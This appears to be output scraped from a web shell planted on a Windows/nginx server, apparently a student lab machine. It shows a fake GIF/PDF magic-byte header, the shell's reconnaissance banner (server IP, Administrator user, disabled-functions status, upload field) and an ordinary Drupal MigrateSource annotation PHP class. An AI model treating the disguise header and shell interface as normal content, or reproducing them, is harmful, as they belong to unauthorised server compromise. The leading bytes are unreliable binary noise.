GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /nginx/html/Student/JimMartinson/Lab12/drupal/core/modules/migrate/src/Annotation/ |
Upload File : |
<?php namespace Drupal\migrate\Annotation; use Drupal\Component\Annotation\Plugin; /** * Defines a migration source plugin annotation object. * * Plugin Namespace: Plugin\migrate\source * * For a working example, check * \Drupal\migrate\Plugin\migrate\source\EmptySource * \Drupal\migrate_drupal\Plugin\migrate\source\UrlAlias * * @see \Drupal\migrate\Plugin\MigratePluginManager * @see \Drupal\migrate\Plugin\MigrateSourceInterface * @see \Drupal\migrate\Plugin\migrate\source\SourcePluginBase * @see \Drupal\migrate\Annotation\MigrateProcessPlugin * @see \Drupal\migrate\Annotation\MigrateDestination * @see plugin_api * * @ingroup migration * * @Annotation */ class MigrateSource extends Plugin implements MultipleProviderAnnotationInterface { /** * A unique identifier for the process plugin. * * @var string */ public $id; /** * Whether requirements are met. * * @var bool */ public $requirements_met = TRUE; /** * Identifies the system providing the data the source plugin will read. * * This can be any type, and the source plugin itself determines how the value * is used. For example, Migrate Drupal's source plugins expect * source_provider to be the name of a module that must be installed and * enabled in the source database. * * @see \Drupal\migrate_drupal\Plugin\migrate\source\DrupalSqlBase::checkRequirements * * @var mixed */ public $source_provider; /** * Specifies the minimum version of the source provider. * * This can be any type, and the source plugin itself determines how it is * used. For example, Migrate Drupal's source plugins expect this to be an * integer representing the minimum installed database schema version of the * module specified by source_provider. * * @var mixed */ public $minimum_version; /** * {@inheritdoc} */ public function getProvider() { if (isset($this->definition['provider'])) { return is_array($this->definition['provider']) ? reset($this->definition['provider']) : $this->definition['provider']; } return FALSE; } /** * {@inheritdoc} */ public function getProviders() { if (isset($this->definition['provider'])) { // Ensure that we return an array even if // \Drupal\Component\Annotation\AnnotationInterface::setProvider() has // been called. return (array) $this->definition['provider']; } return []; } /** * {@inheritdoc} */ public function setProviders(array $providers) { $this->definition['provider'] = $providers; } }